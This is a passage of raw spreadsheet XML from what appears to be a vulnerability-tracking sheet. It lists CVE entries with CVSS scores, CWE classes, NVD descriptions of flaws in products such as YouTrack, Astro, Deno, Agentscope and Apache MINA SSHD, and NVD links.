          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q119" s="5" t="inlineStr"/>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S119" s="5" t="inlineStr">
        <is>
          <t>Soft Machine is a Virtual Machine–based agentic development environment / Cloud OS. In versions 0.2.247 and prior, the workspace HTTP service that listens on 0.0.0.0:8080 inside each sm-ws-* Fly Machine exposes endpoints (/health, /file/&lt;path&gt;, /archive/&lt;dir&gt;) without any authentication or origin check. Any host that can reach TCP/8080 on a workspace can read arbitrary files under that workspace's /workspace root and download whole project trees as tar archives. Because every workspace shares the same Fly private 6PN and resolves all peer addresses via the unauthenticated _instances.internal TXT record, every other sm-ws-* machine on the same Fly app/org is a reachable, unauthenticated attacker — the trust boundary (workspace owner ↔ everyone-else) is missing. At time of publication, there are no publicly known patches.</t>
        </is>
      </c>
      <c r="T119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46711</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100273</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="inlineStr"/>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr"/>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q120" s="5" t="inlineStr"/>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S120" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 authorisation bypass in the scripts debugger allowed arbitrary code execution</t>
        </is>
      </c>
      <c r="T120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100273</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102984</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="inlineStr"/>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr">
        <is>
          <t>npm:@astrojs/node</t>
        </is>
      </c>
      <c r="M121" s="5" t="inlineStr">
        <is>
          <t>11.1.3</t>
        </is>
      </c>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q121" s="5" t="inlineStr"/>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S121" s="5" t="inlineStr">
        <is>
          <t>Astro is a web framework for content-driven websites. Prior to 11.1.3, the @astrojs/node adapter builds a request URL from the Host header, and a malformed port can make that URL invalid. The recovery path reuses the same malformed host and throws an uncaught TypeError: Invalid URL before routing begins. In the default standalone configuration, the request returns an HTTP 500 response and the server continues running, but when staticHeaders is enabled the synchronous handler does not catch the exception and the Node process terminates. Proxies and CDNs that reject malformed Host headers prevent this path from reaching the origin. The issue affects availability only and does not expose data or permit code execution. This issue is fixed in version 11.1.3.</t>
        </is>
      </c>
      <c r="T121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102984</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102990</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="inlineStr"/>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr">
        <is>
          <t>node.js, express</t>
        </is>
      </c>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q122" s="5" t="inlineStr"/>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S122" s="5" t="inlineStr">
        <is>
          <t>basic-ftp is an FTP client for Node.js. Prior to 6.2.1, Client.list() can be forced by a malicious or compromised FTP server to spend quadratic CPU time parsing a directory listing because the RE_LINE expression in src/parseListUnix.ts backtracks across adjacent variable-length owner and group fields when a long Unix-style line has a valid prefix but cannot satisfy the later size and date fields. parseList() selects a parser from the last nonblank line and then applies it to every line, so a normal final line can select the Unix parser while an earlier crafted line blocks the Node.js event loop and freezes the process. This issue is fixed in version 6.2.1.</t>
        </is>
      </c>
      <c r="T122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102990</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93621</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="inlineStr"/>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr"/>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S123" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated SQL Injection in WP Data Access &lt;= 5.5.84 versions.</t>
        </is>
      </c>
      <c r="T123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93621</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96817</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="inlineStr"/>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr"/>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q124" s="5" t="inlineStr"/>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S124" s="5" t="inlineStr">
        <is>
          <t>Subscriber Broken Access Control in MakeCommerce for WooCommerce &lt;= 4.1.0 versions.</t>
        </is>
      </c>
      <c r="T124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96817</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100255</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="inlineStr"/>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr"/>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>CWE-1289</t>
        </is>
      </c>
      <c r="S125" s="5" t="inlineStr">
        <is>
          <t>In JetBrains TeamCity before 2026.2, 
2026.1.4, 
2025.11.8 administrator account takeover was possible via password reset</t>
        </is>
      </c>
      <c r="T125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100255</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102101</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="inlineStr"/>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S126" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.0 is vulnerable to Deserialization of Untrusted Data. A deserialization weakness in Kiteworks Core could, under certain conditions, allow crafted data to be deserialized unsafely, potentially resulting in remote code execution on the appliance. Exploitation depends on an attacker first being able to influence the affected data, so this issue is not exploitable on its own.</t>
        </is>
      </c>
      <c r="T126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102101</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102126</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="inlineStr"/>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr"/>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S127" s="5" t="inlineStr">
        <is>
          <t>A stored cross-site scripting (XSS) weakness in Kiteworks Core could allow an administrator holding only a single, narrowly scoped delegated permission to store crafted content that later executes arbitrary JavaScript in the authenticated session of a System Administrator who views the affected page. This could have permitted the lower-privileged administrator to escalate to full administrative control of the tenant, including the creation of a new administrative account.</t>
        </is>
      </c>
      <c r="T127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102126</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103432</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="inlineStr"/>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S128" s="5" t="inlineStr">
        <is>
          <t>apcupsd through 3.14.14 has an sscanf stack-based buffer overflow in getupsvar() in src/cgi/upsfetch.c (used by upsstats.cgi, multimon.cgi, and upsfstats.cgi), a related issue to CVE-2026-15544.</t>
        </is>
      </c>
      <c r="T128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103432</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103473</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="inlineStr"/>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q129" s="5" t="inlineStr"/>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S129" s="5" t="inlineStr">
        <is>
          <t>Deno versions 2.7.0 through 2.9.7 on Windows contain a command injection vulnerability in node:child_process where shell arguments are escaped for the wrong shell type. Attackers can inject OS commands by passing untrusted arguments with the shell option, allowing arbitrary command execution with Deno process privileges.</t>
        </is>
      </c>
      <c r="T129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103473</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51568</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="inlineStr"/>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr"/>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q130" s="5" t="inlineStr"/>
      <c r="R130" s="5" t="inlineStr"/>
      <c r="S130" s="5" t="inlineStr">
        <is>
          <t>modelscope Agentscope v1.0.18-v1.0.0 is vulnerable to Path Traversal in write_text_file.</t>
        </is>
      </c>
      <c r="T130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51568</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51570</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="inlineStr"/>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr"/>
      <c r="K131" s="5" t="inlineStr"/>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q131" s="5" t="inlineStr"/>
      <c r="R131" s="5" t="inlineStr"/>
      <c r="S131" s="5" t="inlineStr">
        <is>
          <t>modelscope Agentscope v1.0.0-v1.0.8 is vulnerable to Path Traversal in insert_text_file.</t>
        </is>
      </c>
      <c r="T131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51570</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87004</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="inlineStr"/>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr">
        <is>
          <t>docker, gin</t>
        </is>
      </c>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q132" s="5" t="inlineStr"/>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S132" s="5" t="inlineStr">
        <is>
          <t>Tugtainer is a self-hosted app for automating updates of Docker containers. Prior to version 1.31.3, when the OIDC login flow completes, backend/modules/auth/providers/auth_oidc_provider.py decodes the id_token returned by the identity provider's token endpoint using jose.jwt.get_unverified_claims() instead of jwt.decode(). This skips signature verification, audience (aud) validation, issuer (iss) validation, and expiry (exp) checking entirely. The extracted claims (email/sub/preferred_username) are then used directly as the user_id for the resulting Tugtainer session. This issue has been patched in version 1.31.3.</t>
        </is>
      </c>
      <c r="T132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87004</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93994</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="inlineStr"/>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr">
        <is>
          <t>openssh</t>
        </is>
      </c>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q133" s="5" t="inlineStr"/>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>CWE-304</t>
        </is>
      </c>
      <c r="S133" s="5" t="inlineStr">
        <is>
          <t>Apache MINA SSHD is a Java library for client-side and server-side SSH. SSH servers can be configured to require multi-authentication schemes, for instance two different public keys, not just one. In OpenSSH, this would be done by setting in sshd_config AuthenticationMethods "publickey,publickey". Apache MINA SSHD provides an equivalent configuration mechanism.
In Apache MINA SSHD versions up to 2.19.0 and 3.0.0-M1 to 3.0.0-M5 the server code in component sshd-core does not enforce that the two public keys presented are different. A user can thus successfully authenticate with only one of the two key pairs required by presenting this single key twice. This is a partial authentication bypass.
Users are recommended to upgrade to version 2.20.0 or 3.0.0-M6, which fix this issue.</t>
        </is>
      </c>
      <c r="T133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93994</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100256</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="inlineStr"/>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q134" s="5" t="inlineStr"/>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="S134" s="5" t="inlineStr">
        <is>
          <t>In JetBrains IntelliJ IDEA before 2026.2.3 rCE via Structural Search script constraints was possible in untrusted projects</t>
        </is>
      </c>
      <c r="T134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100256</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101885</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="inlineStr"/>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
